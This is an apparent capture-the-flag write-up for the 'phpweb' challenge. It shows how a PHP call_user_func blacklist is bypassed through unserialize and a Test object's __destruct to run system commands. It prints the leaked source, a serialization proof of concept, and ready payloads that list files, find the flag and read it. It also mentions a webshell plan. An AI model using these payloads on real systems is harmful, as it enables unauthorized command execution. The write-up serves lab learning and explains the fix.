https://buuoj.cn/challenges#[%E7%BD%91%E9%BC%8E%E6%9D%AF%202020%20%E6%9C%B1%E9%9B%80%E7%BB%84]phpweb
The page auto-refreshes every 5 s. Capturing the traffic shows that every refresh sends two POST parameters, func and p. Running the captured values through date() locally reproduces the timestamp shown on the page:
PS C:\Users\Administrator\Downloads> php -r "var_dump(date('Y-m-d h:i:s a'));"
Command line code:1:
string(22) "2021-04-23 04:18:46 pm"
So the guess is that func carries a function name and p its argument. Let's change them and see what happens.
Next I tried eval, system, assert, scandir and so on: command execution, code execution, directory listing, none of it worked, so presumably they are filtered (scandir, as the source shows, is not blacklisted at all; it simply returns an array rather than a string, so nothing is echoed). file_get_contents, however, did work and read back the source of index.php:
<?php
$disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk", "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");

function gettime($func, $p) {
    $result = call_user_func($func, $p);
    $a = gettype($result);
    if ($a == "string") {
        return $result;
    } else {
        return "";
    }
}

class Test {
    var $p = "Y-m-d h:i:s a";
    var $func = "date";
    function __destruct() {
        if ($this->func != "") {
            echo gettime($this->func, $this->p);
        }
    }
}

$func = $_REQUEST["func"];
$p = $_REQUEST["p"];
if ($func != null) {
    $func = strtolower($func);
    if (!in_array($func, $disable_fun)) {
        echo gettime($func, $p);
    } else {
        die("Hacker...");
    }
}
?>
Code review: $func must not be in $disable_fun, and the return value of the called function must be a string, otherwise gettime() returns nothing. Then there is the Test class: if we can get an instance of it deserialized, we control $func and $p from there as well. Deserialization goes through unserialize(), which is not blacklisted, so we set $func to unserialize and $p to the serialized form of a Test object. The key point is that $func taken from the Test object never passes through the filter: unserialize() itself returns an object (so the outer gettime() echoes nothing), but when that object is destroyed at the end of the request, __destruct() calls gettime($this->func, $this->p) directly with our values. A blacklist of function names cannot catch this path; only an allowlist of the intended functions (or not calling call_user_func on user-controlled names at all) would.
<?php
class Test {
    var $func = 'system';
    var $p = "whoami;pwd;ls -lha ./";
}
$res = new Test();
echo serialize($res);
?>
func=unserialize&p=O:4:"Test":2:{s:4:"func";s:6:"system";s:1:"p";s:21:"whoami;pwd;ls -lha ./";}
Now to find the flag. It is not in the web root. I had planned to write a shell and connect with AntSword, but there seems to be no write permission, so the only option is to locate the flag directly:
func=unserialize&p=O:4:"Test":2:{s:4:"func";s:6:"system";s:1:"p";s:19:"find / -name *flag*";}
func=unserialize&p=O:4:"Test":2:{s:4:"func";s:6:"system";s:1:"p";s:22:"cat /tmp/flagoefiu4r93";}